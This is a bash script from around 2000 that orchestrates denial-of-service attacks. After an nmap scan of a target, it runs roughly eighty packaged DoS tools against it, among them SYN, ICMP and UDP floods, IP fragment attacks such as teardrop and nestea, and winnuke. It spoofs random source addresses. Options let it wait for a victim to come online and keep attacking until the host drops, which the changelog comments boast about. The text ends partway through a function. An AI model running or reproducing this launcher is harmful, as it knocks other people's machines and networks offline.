#!/bin/bash
#April 10, 2000-
#Updated the code..fixed a bug where the script hung...added one more
#dos attack...thas bout all=P
#
#April 7, 2000-
#Whelp....after some off time from the script...i did some testing...and found
#out that it was kinda stupid to leave a computer alone if there were no ports
#open but the host was up..so i found all the attacks that didn't need ports
#and included them into their own list...now when u attack a system with no
#ports......=]  have fun!=]  oh..and updated the ascii=P
#
#April 1, 2000-
#Made just a few minor changes this morning...the script now has a progress
#bar-like thing for the timed attacks..and i put in a compile script for the
#sources in case the bins don't work.  oh...and i fixed some more bugs...and 
#umm...that's about it. oh and fixed up some shit where the multiple ip attack
#gives more information.  just added some more attacks.....now we're up to
#81!! still working on getting more=P  oh and now using printf function in
#some areas instead of echo....since bash's echo doesn't like \c....so now
#the script no longer requires ksh.
#March 31, 2000-
#heh...while u all were slackin....i was scriptin....did a major overhaul of
#the script today....lots of maintainance...added 4 more DoS attacks...now up
#to 73=] still trying to add more....if u want any added that aren't in...
#email em to spender@exterminator.net and include compiling instructions=P
#...added some things to the logging...and the script now requires the newest
#version of nmap, since the new one's output is different.  I also changed some
#things with operating system detection.  oh...and the script now says and logs
#what attack dropped each connection...especially useful for the multiple ip
#attacks.  well that's about all...it's damn late and i'm tired=\ oh..and
#once again...greetz to the ss programming(and now ever more powerful hardware
#;) ) team...heh u guys rock=P  strafgge and ecrofeht are muh bitches=P
#and a small puke to www.securifyfocus.com for blowing off my submission...
#of course they'll post much lamer scripts than this....  (packetstorm r0x;) )
#
#March 29, 2000-
#It never stops=]  some new options i put in today....lemme talk about all
#of em.  well...lemme first clarify that while the cipgen.sh creates ips
#for any c-class subnet, datamass.sh does not work solely off that...in other
#words...you can put any ips in there you want and the script will work off
#them.  when i get to it i'll make an option where u can specify any file
#with a list of ips to use...but i just don't see a point for it right now.
#Anywayz...on to the new options=P  there's an option for line speed...so
#u lucky people with T3's can shell out more packets with the script than
#somebody on a modem or T1.  There's also an option where u specify an IP,
#and then have the program wait till they come online, so you can attack them.
#(i love this one:)) especially fun when used with the -x option to kill them
#every time and the -a option in the datamass.sh script to keep looping the
#attack...basically it will keep someone constantly dropped (as long as your
#box stays up heh=P  also a new option to only scan ports..for those days
#when ur not feelin as naughty.  changed the ascii a little and tried to 
#shove one more feature listing into the ascii as well.  and the script
#version is up to 1.5.  Have fun with it...=P  oh..and u need the korn
#shell to run this script...since my version of bash bitches when i try to
#use \c with echo=\ oh..and just added service names to the port listing=P
#
#March 28, 2000-
#heh...added some more stuff...just basically gave it more customization...
#no more attacks..yet.  added options to specify source ips...got the new
#ascii...an option to specify line speed...listing of options at startup...
#and fixed a few misc bugs=P  oh and put a limit on the kkill DoS since i
#found it doesn't wanna stop...and script now sends signal to correctly
#terminate lingering executables.  (it works perfectly, except there's a small,
#somewhat annoying message from the shell...but i say better ugly and working
#than pretty and screwed up=P)there's really no way around it...i've tried
#working with background processes and killing it though a job, but it doesn't
#seem to kill it right. (besides killall will wait for the process to die)
#
#March 27, 2000-
#Been workin on it some more...lots more shit, dunno exaclty what...uhhh
#c-class ip attacks...(i wouldn't recommend it) oh and lemme give a disclaimer:
#I didn't use this script on any computer outside my personal network on a
#testing basis to check the vulnerabilities of my system.  You should not use
#this program for malicious use, becuz if u do it's you're fault, not mine.
#Actually if u do use it you're a loser becuz u didn't write it yourself=P heh
#if ya got probs with the script, mail me at spender@exterminator.net
#oh...new options too...check em out
#btw...please don't abuse the script...i wrote it for educational purposes...=\
#added an ugly ass ascii too...i think i've been influenced by the DC ghetto
#or something=P
#
#March 25, 2000-
#Many improvements...new options like port range and "don't stop till they drop"
#(heh love that one=P) future options might include a setting where further
#attacks are longer and harder...numofattacks + n =P this script can be run
# without any user intervention whatsoever.  Even attacks that would normally
#require intervention are handled correctly in this program...(eat your heart
#out spikeman=] )  Oh, and there's 69 attacks...that's right, SIXTY-NINE=] 
#(my fav # =P )trying to add more but some are a bitch to compile=\
#Hope you enjoy! -spender
#
#Greetz-
#Gridmark, spyropyro(muh gf=P), the ss programming teeem heh=P, vetesgirl cuz
#she's so nice, not the stupid swedish jerk on efnet with nick spender who keeps
#taking it from me=P, all the people who coded the shit used in my script
#
#If y'all are bored go watch some anime(I recommend Grave of the Fireflies...
#*sniff =[ ) l8tz
#
#BTW: this script requires nmap....so pick yourself up a copy and compile it...
#then copy it to either /usr/bin, /usr/local/bin, or in the ./bin directory of
#where this script is. (I can't do everything for you=])
clear
DONTSTOP=0
SCANONLY=0
LINESPEED=1
WATCHCON=0
function usage {
echo "Usage: $0 [-p] [portlow-porthigh] [-x] [-v] [logfile] [-k]"
echo " [-d] [destination ip] [-s] [-l] [T1|T3|Modem] [-i] [source ip]"
echo "Options:"
echo "[-d]: Specifies destination IP: REQUIRED"
echo "[-p]: Specifies port range to scan.  ex: -p 1-1024"
echo "[-x]: \"Don't stop till they drop\""
echo "[-v]: Logs results of scan to file.  ex: -v logfile.log"
echo "[-s]: Scan ports only."
echo "[-l]: Specifies line speed.  Choose from T1,T3, and Modem."
echo "[-i]: Specifies source IP.  ex: -i 127.0.0.1"
echo "[-k]: Wait till host is online, then attack."
exit 1
}

if [ $# -lt 2 ]; then
usage
fi
LOGFILE=
PORTLIST=
while getopts p:v:d:i:l:xska OPTION ; do
    case "$OPTION" in
    p) PORTLIST="$OPTARG" ;;
    v) LOGFILE="$OPTARG" ;;
    x) DONTSTOP=1 ;;
    a) LOOPING=1 ;;
    d) DESTIP="$OPTARG" ;;
    i) SRCIP="$OPTARG" ;;
    s) SCANONLY=1 ;;
    l) case "$OPTARG" in
	T1) LINESPEED=2 ;;
	T3) LINESPEED=4 ;;
	Cable) LINESPEED=2 ;;
	Modem) LINESPEED=1 ;;
       esac ;;
    k) WATCHCON=1 ;;
   \?) usage ;;
   esac
   
done
if [ "$PORTLIST" = " " ]; then
PORTLIST=
elif [ "$LOGFILE" = " " ]; then
LOGFILE=
fi
if [ -f ./output.txt ]; then
rm -rf ./output.txt
fi
if [ -f ./svcname.txt ]; then
rm -rf ./svcname.txt
fi
if [ -f ./output2.txt ]; then
rm -rf ./output2.txt
fi

if [ "$DESTIP" = "" ] || [ "$DESTIP" = "" ]; then
usage
fi
if [ -f /usr/local/bin/nmap ]; then
    NMAPDIR="/usr/local/bin/nmap"
elif [ -f /usr/bin/nmap ]; then
	NMAPDIR="/usr/bin/nmap"
elif [ -f ./bin/nmap ]; then
	    NMAPDIR="./bin/nmap"
else
	    echo "NMAP not found, or not placed in either /usr/local/bin or /usr/bin."
	    echo "Please copy NMAP to either directory and run this script again." 
    exit 1

fi


if [ "$PORTLIST" = "" ]; then
PORTLIST="1-65535"
fi
echo "          d8b           d8b                                       d8b"
echo "          888         \"88888\"                                     888"
echo "     e88~-888  e88~-888 888  e88~-888 d88-~88e   e88~-e   e88~-e  888"
echo "    d88D  888 d888  888 888 d888  888 888  P88b d888  8b d888  8b 888"
echo "    888A  888 8888  888 888 8888  888 888  O888 8888  88 8888  88 888" 
echo "    888T  888 Y888  888 888 Y888  888 888  O88P Y888  8P Y888  8P 888"
echo "     \"8A_-888  \"88_-888 \"8\"  \"88_-888 888-_L8\"   \"88_-\"   \"88_-\"  \"8\""
echo "                                      888                            "
echo "    \"\"\"\"\"Y888888888888888888888888888 \"8\" 88888888beeeeeeeeeeee      "
echo " Version 2.1      \"\"\"\"\"\"\"Y888888888888eee888888888888888888888888ee  "
echo " * Multiple IP attacks      \"\"\"\"\"\"\"\"Y888888888888888888888888888P    "
echo " * Connection Watching                     \"\"\"\"\"\"\"Y888888888P        "
echo " * Looping attacks * \"Don't stop till they drop\"    \"\"\"\"\"\"           "
echo " * 82 DoS attacks * Line speed option * Portless attacks             "
echo " * Port range specification * Random source IP generation            "

if [ "$SRCIP" = "" ] || [ "$SRCIP" = "" ]; then
RANDOM1=$RANDOM
RANDOM2=$RANDOM
RANDOM3=$RANDOM
RANDOM4=$RANDOM
RANDOM1=`echo "$RANDOM1" | cut -b-2`
RANDOM2=`echo "$RANDOM2" | cut -b-2`
RANDOM3=`echo "$RANDOM3" | cut -b-2`
RANDOM4=`echo "$RANDOM4" | cut -b-2`
SRCIP=`echo "$RANDOM1.$RANDOM2.$RANDOM3.$RANDOM4"`
fi
function DONTSTOPPER {
        echo "Continuing attack...he's not dead yet..."
	COUNTER1=1
        OUTPUT=`cat ./output.txt -n | grep $COUNTER1 -w | cut -b8-`
}
function pingtest {
ping=`ping -c3 $DESTIP | grep 100%`
	        
if [ "$ping" = "3 packets transmitted, 0 packets received, 100% packet loss" ]; then
        echo "Host was dropped by $LASTATTACK attack."
	if [ -n "$LOGFILE" ]; then
	echo "Dropped by $LASTATTACK attack." >> ./$LOGFILE
	echo "-----------------------------"
	fi
	exit 0
fi
}

function nestea2 {
 echo "Running IP fragment attack (nestea2)..."
 ./bin/nestea2 $SRCIP $DESTIP $DESTIP -s $OUTPUT -t $OUTPUT -n `expr 300 "*" $LINESPEED` -q 1>/dev/null 2>/dev/null
LASTATTACK="nestea2"
pingtest
}
function comatose {
 echo "Running ICMP flooder (comatose)..."
 ./bin/comatose $SRCIP $DESTIP `expr 10 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="comatose"
pingtest
}
function hell {
 echo "Running SYN flooder (hell)..."
 ./bin/hell $DESTIP $OUTPUT $OUTPUT 1>/dev/null 2>/dev/null &
TEST=1
while [ $TEST -le `expr 15 "*" $LINESPEED` ]
do
 sleep 1
 printf "."
TEST=`expr $TEST + 1`
done
echo "DONE!"
 killall -9 -q hell 1>/dev/null 2>/dev/null
 killall -9 -w -q hell 1>/dev/null 2>/dev/null
LASTATTACK="hell"
 pingtest
}
function laser {
 echo "Running POP3 attack (laser)..."
 ./bin/laser $DESTIP 1>/dev/null 2>/dev/null
LASTATTACK="laser"
pingtest
}
function linuxicmp {
 echo "Running ICMP flooder (linux-icmp)..."
 ./bin/linux-icmp $DESTIP $OUTPUT 1>/dev/null 2>/dev/null &
TEST=1
while [ $TEST -le `expr 15 "*" $LINESPEED` ]
do
 sleep 1
 printf "."
TEST=`expr $TEST + 1`
done
echo "DONE!"
 killall -9 -q linux-icmp 1>/dev/null 2>/dev/null
 killall -9 -w -q linux-icmp 1>/dev/null 2>/dev/null
LASTATTACK="linux-icmp"
 pingtest
}
function slice3 {
 echo "Running TCP storm attack (slice3)..."
 ./bin/slice3 0 $DESTIP $OUTPUT $OUTPUT 1>/dev/null 2>/dev/null &
TEST=1
while [ $TEST -le `expr 15 "*" $LINESPEED` ]
do
 sleep 1
 printf "."
TEST=`expr $TEST + 1`
done
echo "DONE!"
 killall -9 -q slice3 1>/dev/null 2>/dev/null
 killall -9 -w -q slice3 1>/dev/null 2>/dev/null
LASTATTACK="slice3"
 pingtest
}
function sprite {
 echo "Running SYN flooder (sprite)..."
 ./bin/sprite 0 $DESTIP $OUTPUT $OUTPUT `expr 30 "*" $LINESPEED` 1>/dev/null 2>/dev/null &
TEST=1
while [ $TEST -le `expr 15 "*" $LINESPEED` ]
do
 sleep 1
 printf "."
TEST=`expr $TEST + 1`
done
echo "DONE!"
 killall -9 -q sprite 1>/dev/null 2>/dev/null
 killall -9 -w -q sprite 1>/dev/null 2>/dev/null
LASTATTACK="sprite"
 pingtest
}
function stealth {
 echo "Running UDP flooder (stealth)..."
 ./bin/stealth $DESTIP $OUTPUT 1>/dev/null 2>/dev/null &
TEST=1
while [ $TEST -le `expr 15 "*" $LINESPEED` ]
do
 sleep 1
 printf "."
TEST=`expr $TEST + 1`
done
echo "DONE!"
 killall -9 -q stealth 1>/dev/null 2>/dev/null
 killall -9 -w -q stealth 1>/dev/null 2>/dev/null
LASTATTACK="stealth"
 pingtest
}
function ton {
echo "Running UDP flooder (ton)..."
./bin/ton -s $SRCIP -n `expr 300 "*" $LINESPEED` -d $OUTPUT -o $OUTPUT $DESTIP 1>/dev/null 2>/dev/null
LASTATTACK="ton"
 pingtest
}   
function cocksuck {
 echo "Running SYN flooder (cocksuck)..."
 ./bin/cocksuck $DESTIP $OUTPUT `expr 3000 "*" $LINESPEED` $SRCIP 1>/dev/null 2>/dev/null
LASTATTACK="cocksuck"
pingtest
}
function oshare {
 echo "Running oshare packet flooder (oshare_1_gou)..."
 ./bin/oshare_1_gou $DESTIP `expr 20 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="oshare"
pingtest
}
function gin {
 echo "Running modem resetter (gin)..."
 ./bin/gin $SRCIP $DESTIP `expr 200 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="gin"
pingtest
}
function hestra {
 echo "Running ICMP/UDP flooder (hestra)..."
 ./bin/hestra $DESTIP $OUTPUT 1>/dev/null 2>/dev/null &
TEST=1
while [ $TEST -le `expr 15 "*" $LINESPEED` ]
do
 sleep 1
 printf "."
TEST=`expr $TEST + 1`
done
echo "DONE!"
 killall -9 -q hestra 1>/dev/null 2>/dev/null
 killall -9 -w -q hestra 1>/dev/null 2>/dev/null
LASTATTACK="hestra"
 pingtest
} 
function duy {
 echo "Running ICMP/UDP flooder (duy)..."
 ./duy $DESTIP $OUTPUT 1>/dev/null 2>/dev/null &
TEST=1
while [ $TEST -le `expr 15 "*" $LINESPEED` ]
do
 sleep 1
 printf "."
TEST=`expr $TEST + 1`
done
echo "DONE!"
 killall -9 -q duy 1>/dev/null 2>/dev/null
 killall -9 -w -q duy 1>/dev/null 2>/dev/null
LASTATTACK="duy"
 pingtest
}
function ruc {
 echo "Running TCP storm attack (ruc)..."
 ./bin/ruc $DESTIP $OUTPUT 1>/dev/null 2>/dev/null &
TEST=1
while [ $TEST -le `expr 15 "*" $LINESPEED` ]
do
 sleep 1
 printf "."
TEST=`expr $TEST + 1`
done
echo "DONE!"
 killall -9 -q ruc 1>/dev/null 2>/dev/null
 killall -9 -w -q ruc 1>/dev/null 2>/dev/null
 rm -rf ./bin/ruckuS.log 1>/dev/null 2>/dev/null
LASTATTACK="ruc"
 pingtest
}
function dosfrontpage {
 echo "Running FrontPage DoS (DoS.frontpage)..."
 perl ./bin/DoS.frontpage.pl $DESTIP 1>/dev/null 2>/dev/null
LASTATTACK="Frontpage DoS"
 pingtest
}
function jaypee {
 echo "Running Windows attack (jaypee)..."
 ./bin/jaypee $DESTIP 1>/dev/null 2>/dev/null
LASTATTACK="jaypee"
 pingtest
}
function udpflood {
 echo "Running UDP flooder (udpflood)..."
 ./bin/udpflood $SRCIP $DESTIP `expr 200 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="udpflood"
 pingtest
}
function rcon {
 echo "Running Quake server exploit (rcon)..."
 ./bin/rcon $DESTIP "say Die Fucker!" $OUTPUT 1>/dev/null 2>/dev/null
LASTATTACK="rcon"
 pingtest
}
function arnup100 {
 echo "Running UDP datagram attack (arnup100)..."
 ./bin/arnup100 $SRCIP $OUTPUT $DESTIP $OUTPUT 1>/dev/null 2>/dev/null
LASTATTACK="arnup100"
 pingtest
}
function onetwothreefour {
 echo "Running ICMP attack (1234)..."
 ./bin/1234 $SRCIP $DESTIP `expr 40 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="1234"
 pingtest
}
function opentear {
 echo "Running UDP attack (opentear)..."
 ./bin/opentear $DESTIP 0 0 1>/dev/null 2>/dev/null &
TEST=1
while [ $TEST -le `expr 15 "*" $LINESPEED` ]
do
 sleep 1
 printf "."
TEST=`expr $TEST + 1`
done
echo "DONE!"
 killall -9 -q opentear 1>/dev/null 2>/dev/null
 killall -9 -w -q opentear 1>/dev/null 2>/dev/null
LASTATTACK="opentear"
 pingtest
}
function raped {
 echo "Running TCP storm attack (raped)..."
 ./bin/raped $DESTIP $OUTPUT 1>/dev/null 2>/dev/null &
TEST=1
while [ $TEST -le `expr 15 "*" $LINESPEED` ]
do
 sleep 1
 printf "."
TEST=`expr $TEST + 1`
done
echo "DONE!"
 killall -9 -q raped 1>/dev/null 2>/dev/null
 killall -9 -w -q raped 1>/dev/null 2>/dev/null
LASTATTACK="raped"
 pingtest
}
function stream {
 echo "Running TCP storm attack (stream)..."
 ./bin/stream $DESTIP $OUTPUT 0 1>/dev/null 2>/dev/null &
TEST=1
while [ $TEST -le `expr 15 "*" $LINESPEED` ]
do
 sleep 1
 printf "."
TEST=`expr $TEST + 1`
done
echo "DONE!"
 killall -9 -q stream 1>/dev/null 2>/dev/null
 killall -9 -w -q stream 1>/dev/null 2>/dev/null
LASTATTACK="stream"
 pingtest
}
function doslinux {
 echo "Running DoS-Linux..."
 perl bin/DoS-Linux.pl -t $DESTIP 1>/dev/null 2>/dev/null
LASTATTACK="DoS-Linux"
 pingtest
}
function ascendfoo {
 echo "Running ICMP echo attack (ascend-foo)..."
 ./bin/ascend-foo $DESTIP 64 1>/dev/null 2>/dev/null
LASTATTACK="ascendfoo"
 pingtest
}
function beer {
 echo "Running general attack (beer)..."
 ./bin/beer $DESTIP `expr 40 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="beer"
 pingtest
}
function biffit {
 echo "Running UDP attack (biffit)..."
 ./bin/biffit $DESTIP root 1>/dev/null 2>/dev/null
LASTATTACK="biffit"
 pingtest
}
function bloop {
 echo "Running ICMP flooder (bloop)..."
 ./bin/bloop $SRCIP $DESTIP `expr 60 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="bloop"
 pingtest
} 
function boink {
 echo "Running IP fragment attack (boink)..."
 ./bin/boink $SRCIP $DESTIP $OUTPUT $OUTPUT `expr 50 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="boink"
 pingtest
}
function bonk {
 echo "Running IP fragment attack (bonk)..."
 ./bin/bonk $SRCIP $DESTIP `expr 50 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="bonk"
 pingtest
}
function coke {
 echo "Running UDP flooder (coke)..."
 ./bin/coke $DESTIP `expr 200 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="coke"
 pingtest
}
function conseal {
 echo "Running Conseal PC firewall attack..."
 ./bin/conseal $DESTIP `expr 10000 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="conseal"
 pingtest
}
function echok {
 echo "Running ICMP ping flooder (echok)..."
 ./bin/echok -f -n `expr 100 "*" $LINESPEED` -w 1 $SRCIP $DESTIP 1>/dev/null 2>/dev/null
LASTATTACK="echok"
 pingtest
}  
function fawx {
 echo "Running IGMP attack (fawx)..."
 ./bin/fawx $SRCIP $DESTIP `expr 50 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="fawx"
 pingtest
}
function foqerc {
 echo "Running flooder (foqerc)..."
 ./bin/foqerc $DESTIP root 1>/dev/null 2>/dev/null
LASTATTACK="foqerc"
 pingtest
}
function galt_gin {
 echo "Running modem resetter (galt_gin)..."
 ./bin/galt_gin -m ATDT411 $DESTIP 1>/dev/null 2>/dev/null
LASTATTACK="galt_gin"
 pingtest
}
function gewse {
  echo "Running identd flooder (gewse)..."
  ./bin/gewse $DESTIP `expr 40 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="gewse"
 pingtest
}
function gewse5 {
  echo "Running identd flooder (gewse5)..."
  ./bin/gewse5 $DESTIP `expr 40 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="gewse5"
 pingtest
}
function jolt {
 echo "Running IP fragment attack (jolt)..."
 ./bin/jolt $DESTIP $SRCIP `expr 50 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="jolt"
 pingtest
}
function kkill {
 echo "Running inetd flooder (kkill)..."
 ./bin/kkill $DESTIP $OUTPUT 1>/dev/null 2>/dev/null &
TEST=1
while [ $TEST -le `expr 15 "*" $LINESPEED` ]
do
 sleep 1
 printf "."
TEST=`expr $TEST + 1`
done
echo "DONE!"
killall -9 kkill 1>/dev/null 2>/dev/null
killall -9 -w kkill 1>/dev/null 2>/dev/null
LASTATTACK="kkill"
 pingtest
}
function koc {
 echo "Running IGMP attack (koc)..."
 ./bin/koc $DESTIP -p $OUTPUT -t `expr 30 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="koc"
 pingtest
}
function kod {
 echo "Running IGMP attack (kod)..."
 ./bin/kod $DESTIP -p $OUTPUT -t `expr 30 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="kod"
 pingtest
}
function kox {
 echo "Running IGMP attack (kox)..."
 ./bin/kox $DESTIP 1>/dev/null 2>/dev/null
 ./bin/kox $DESTIP 1>/dev/null 2>/dev/null
LASTATTACK="kox"
 pingtest
}
function inetddos {
 echo "Running inetd attack (inetd.DoS)..."
 ./bin/inetd.DoS $DESTIP $OUTPUT `expr 100 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="inetddos"
 pingtest
}
function land {
 echo "Running TCP exploit attack (land)..."
 ./bin/land $DESTIP $OUTPUT 1>/dev/null 2>/dev/null
LASTATTACK="land"
 pingtest
}
function latierra {
 echo "Running TCP exploit attack (La Tierra)..."
 ./bin/latierra -i $DESTIP -b $OUTPUT -e $OUTPUT -p 6 -m 4 -t f -o 1 -l `expr 2 "*" $LINESPEED` 1>/dev/null 2>/dev/null
 ./bin/latierra -i $DESTIP -b $OUTPUT -e $OUTPUT -p 6 -m 4 -t s -o 1 -l `expr 2 "*" $LINESPEED` 1>/dev/null 2>/dev/null
 ./bin/latierra -i $DESTIP -b $OUTPUT -e $OUTPUT -p 17 -m 4 -t a -o 1 -l `expr 2 "*" $LINESPEED` 1>/dev/null 2>/dev/null
 ./bin/latierra -i $DESTIP -b $OUTPUT -e $OUTPUT -p 17 -m 4 -t r -o 1 -l `expr 2 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="latierra"
 pingtest
}
function misfrag {
 echo "Running TCP fragment attack (misfrag)..."
 ./bin/misfrag $SRCIP $OUTPUT $DESTIP $OUTPUT `expr 200 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="misfrag"
 pingtest
}
function moyari13 {
 echo "Running ICMP attack (moyari13)..."
 ./bin/moyari13 $DESTIP `expr 50 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="moyari13"
 pingtest
}
function mutilate {
 echo "Running port flooder (mutilate)..."
 ./bin/mutilate $DESTIP $OUTPUT 1>/dev/null 2>/dev/null
 ./bin/mutilate $DESTIP $OUTPUT 1>/dev/null 2>/dev/null
LASTATTACK="mutilate"
 pingtest
}
function nestea {
 echo "Running IP fragment attack (nestea)..."
 ./bin/nestea $SRCIP $DESTIP -s $OUTPUT -t $OUTPUT -n `expr 100 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="nestea"
 pingtest
}
function newtear {
 echo "Running IP fragment attack (newtear)..."
 ./bin/newtear $SRCIP $DESTIP -s $OUTPUT -t $OUTPUT -n `expr 100 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="newtear"
 pingtest
}
function teardrop {
 echo "Running IP fragment attack (teardrop)..."
 ./bin/teardrop $SRCIP $DESTIP -s $OUTPUT -t $OUTPUT -n `expr 100 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="teardrop"
 pingtest
}

function orgasm {
 echo "Running port flooder (orgasm)..."
 ./bin/orgasm $DESTIP $OUTPUT $OUTPUT `expr 100 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="orgasm"
 pingtest
}
function overdrop {
 echo "Running IP fragment attack (overdrop)..."
 ./bin/overdrop $DESTIP -n `expr 50 "*" $LINESPEED` -s $SRCIP 1>/dev/null 2>/dev/null
LASTATTACK="overdrop"
 pingtest
}
function pepsi {
 echo "Running UDP flooder (pepsi)..."
 ./bin/pepsi -s $SRCIP -n `expr 200 "*" $LINESPEED` -p 1024 -d $OUTPUT -o $OUTPUT -w 1 $DESTIP 1>/dev/null 2>/dev/null
LASTATTACK="pepsi"
 pingtest
}
function pimp {
 echo "Running IGMP attack (pimp)..."
 ./bin/pimp $DESTIP 1>/dev/null 2>/dev/null
LASTATTACK="pimp"
 pingtest
}
function pimp2 {
 echo "Running IGMP attack (pimp2)..."
 ./bin/pimp2 $DESTIP `expr 50 "*" $LINESPEED` $SRCIP 31 1 1>/dev/null 2>/dev/null
LASTATTACK="pimp2"
 pingtest
}

function pirchslap {
 echo "Running pirchirc exploit (pirchslap)..."
 ./bin/pirchslap $DESTIP 1>/dev/null 2>/dev/null
LASTATTACK="pirchslap"
 pingtest
}
function pong {
 echo "Running ICMP flooder (pong)..."
 ./bin/pong -fV -c `expr 40 "*" $LINESPEED` $DESTIP $SRCIP 1>/dev/null 2>/dev/null
LASTATTACK="pong"
 pingtest
}       
function rape {
 echo "Running flooder (rape)..."
 ./bin/rape $DESTIP $OUTPUT `expr 60 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="rape"
 pingtest
}
function rc8 {
 echo "Running UDP flooder (rc8)..."
 ./bin/rc8 $SRCIP $DESTIP `expr 100 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="rc8"
 pingtest
}
function spiffit {
 echo "Running UDP attack (spiffit)..."
 ./bin/spiffit $SRCIP $DESTIP $DESTIP root `expr 100 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="spiffit"
 pingtest
}
function stuffit {
 echo "Running ping attack (stuffit)..."
 ping $DESTIP -f -s 1024 -p 7e 1>/dev/null 2>/dev/null &
TEST=1
while [ $TEST -le `expr 15 "*" $LINESPEED` ]
do
 sleep 1
 printf "."
TEST=`expr $TEST + 1`
done
echo "DONE!"
 killall -9 -q ping 1>/dev/null 2>/dev/null
 killall -9 -w -q ping 1>/dev/null 2>/dev/null
LASTATTACK="stuffit"
 pingtest
} 
function ssping {
 echo "Running oversized ping attack (ssping)..."
 ./bin/ssping $SRCIP $DESTIP `expr 100 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="ssping"
 pingtest
}
function syndrop {
 echo "Running TCP SYN attack (syndrop)..."
 ./bin/syndrop $SRCIP $DESTIP -s $OUTPUT -t $OUTPUT -n `expr 100 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="syndrop"
 pingtest
}
function synful {
 echo "Running SYN flooder (synful)..."
 ./bin/synful $DESTIP 1>/dev/null 2>/dev/null
 ./bin/synful $DESTIP 1>/dev/null 2>/dev/null
LASTATTACK="synful"
 pingtest
}
function synhose {
 echo "Running SYN flooder (synhose)..."
 ./bin/synhose $DESTIP $OUTPUT `expr 2000 "*" $LINESPEED` 1>/dev/null 2>/dev/null &
LASTATTACK="synhose"
 pingtest
}
function synk {
 echo "Running SYN flooder (synk)..."
 ./bin/synk 0 $DESTIP $OUTPUT $OUTPUT 1>/dev/null 2>/dev/null &
TEST=1
while [ $TEST -le `expr 15 "*" $LINESPEED` ]
do
 sleep 1
 printf "."
TEST=`expr $TEST + 1`
done
echo "DONE!"
 killall -9 -q synk 1>/dev/null 2>/dev/null
 killall -9 -w -q synk 1>/dev/null 2>/dev/null
LASTATTACK="synk"
 pingtest
}
function synk4 {
 echo "Running SYN flooder (synk4)..."
 ./bin/synk4 0 $DESTIP $OUTPUT $OUTPUT 1>/dev/null 2>/dev/null &
TEST=1
while [ $TEST -le `expr 15 "*" $LINESPEED` ]
do
 sleep 1
 printf "."
TEST=`expr $TEST + 1`
done
echo "DONE!"
 killall -9 -q synk4 1>/dev/null 2>/dev/null
 killall -9 -w -q synk4 1>/dev/null 2>/dev/null 
LASTATTACK="synk4"
 pingtest
}
function targa {
 echo "Running combo attack (targa)..."
 ./bin/targa $DESTIP $DESTIP -t 0 -n `expr 2 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="targa"
 pingtest
}
function targa2 {
 echo "Running combo attack (targa2)..."
 ./bin/targa2 $DESTIP $DESTIP -t 0 -n `expr 2 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="targa2"
 pingtest
}
function targa3 {
 echo "Running packet generator (targa3)..."
 ./bin/targa3 $DESTIP -c `expr 3 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="targa3"
 pingtest
}
function trash {
 echo "Running ICMP flooder (trash)..."
 ./bin/trash $SRCIP $DESTIP `expr 100 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="trash"
 pingtest
}
function trash2 { 
 echo "Running ICMP flooder (trash2)..."
 ./bin/trash2 $DESTIP `expr 100 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="trash2"
 pingtest
}
function twinge {
 echo "Running ICMP flooder (twinge)..."
 ./bin/twinge $DESTIP `expr 100 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="twinge"
 pingtest
}
function udpdata {
 echo "Running UDP flooder (udpdata)..."
 ./bin/udpdata $SRCIP $OUTPUT $DESTIP $OUTPUT 1>/dev/null 2>/dev/null
LASTATTACK="udpdata"
 pingtest
}
function winfreez {
 echo "Running ICMP flooder (winfreez)..."
 ./bin/winfreez $DESTIP $SRCIP `expr 40 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="winfreez"
 pingtest
}
function winnuke {
 echo "Running OOB nuker (winnuke)..."
 ./bin/winnuke $DESTIP 1>/dev/null 2>/dev/null
LASTATTACK="winnuke"
 pingtest
}
function killwin {
 echo "Running OOB nuker (killwin)..."
 ./bin/killwin $DESTIP -p $OUTPUT -t `expr 30 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="killwin"
 pingtest
}
function wingatecrash {
 echo "Running wingate crasher (wingatecrasher)..."
 ./bin/wingatecrasher $DESTIP $OUTPUT 1>/dev/null 2>/dev/null
LASTATTACK="wingatecrash"
 pingtest
}
function flushot {
 echo "Running flooder (flushot)..."
